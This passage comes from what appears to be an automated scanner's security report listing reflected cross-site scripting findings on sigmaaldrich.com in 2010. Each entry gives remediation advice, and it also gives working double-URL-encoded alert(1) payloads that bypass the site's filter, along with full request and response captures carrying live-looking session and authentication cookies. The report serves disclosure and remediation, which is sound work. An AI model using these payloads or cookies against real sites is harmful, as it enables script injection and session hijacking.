Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:02 GMT
Content-Length: 28951
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etcc5755";alert(1)//abe43477296/medialib/labware/labware-icons/spectroscopy","E404") ;
   </script>
...[SNIP]...

1.394. http://www.sigmaaldrich.com/etc/medialib/labware/labware-icons/spectroscopy [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/labware/labware-icons/spectroscopy

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f7004%2522%253balert%25281%2529%252f%252fa028f356556 was submitted in the REST URL parameter 2. This input was echoed as f7004";alert(1)//a028f356556 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialibf7004%2522%253balert%25281%2529%252f%252fa028f356556/labware/labware-icons/spectroscopy HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:03 GMT
Content-Length: 28951
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialibf7004";alert(1)//a028f356556/labware/labware-icons/spectroscopy","E404") ;
   </script>
...[SNIP]...

1.395. http://www.sigmaaldrich.com/etc/medialib/labware/labware-icons/spectroscopy [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/labware/labware-icons/spectroscopy

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5f434%2522%253balert%25281%2529%252f%252f8691078ec1c was submitted in the REST URL parameter 3. This input was echoed as 5f434";alert(1)//8691078ec1c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/labware5f434%2522%253balert%25281%2529%252f%252f8691078ec1c/labware-icons/spectroscopy HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:05 GMT
Content-Length: 28951
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/labware5f434";alert(1)//8691078ec1c/labware-icons/spectroscopy","E404") ;
   </script>
...[SNIP]...

1.396. http://www.sigmaaldrich.com/etc/medialib/labware/labware-icons/spectroscopy [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/labware/labware-icons/spectroscopy

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 70f6e%2522%253balert%25281%2529%252f%252f150685e59da was submitted in the REST URL parameter 4. This input was echoed as 70f6e";alert(1)//150685e59da in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/labware/labware-icons70f6e%2522%253balert%25281%2529%252f%252f150685e59da/spectroscopy HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:07 GMT
Content-Length: 28951
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/labware/labware-icons70f6e";alert(1)//150685e59da/spectroscopy","E404") ;
   </script>
...[SNIP]...

1.397. http://www.sigmaaldrich.com/etc/medialib/labware/labware-icons/spectroscopy [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/labware/labware-icons/spectroscopy

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bf92e%2522%253balert%25281%2529%252f%252f76c2d71983c was submitted in the REST URL parameter 5. This input was echoed as bf92e";alert(1)//76c2d71983c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/labware/labware-icons/spectroscopybf92e%2522%253balert%25281%2529%252f%252f76c2d71983c HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:09 GMT
Content-Length: 28951
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/labware/labware-icons/spectroscopybf92e";alert(1)//76c2d71983c","E404") ;
   </script>
...[SNIP]...

1.398. http://www.sigmaaldrich.com/etc/medialib/labware/labware-icons/stirrers [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/labware/labware-icons/stirrers

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8a2d2%2522%253balert%25281%2529%252f%252f7d7bae8e9ef was submitted in the REST URL parameter 1. This input was echoed as 8a2d2";alert(1)//7d7bae8e9ef in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc8a2d2%2522%253balert%25281%2529%252f%252f7d7bae8e9ef/medialib/labware/labware-icons/stirrers HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
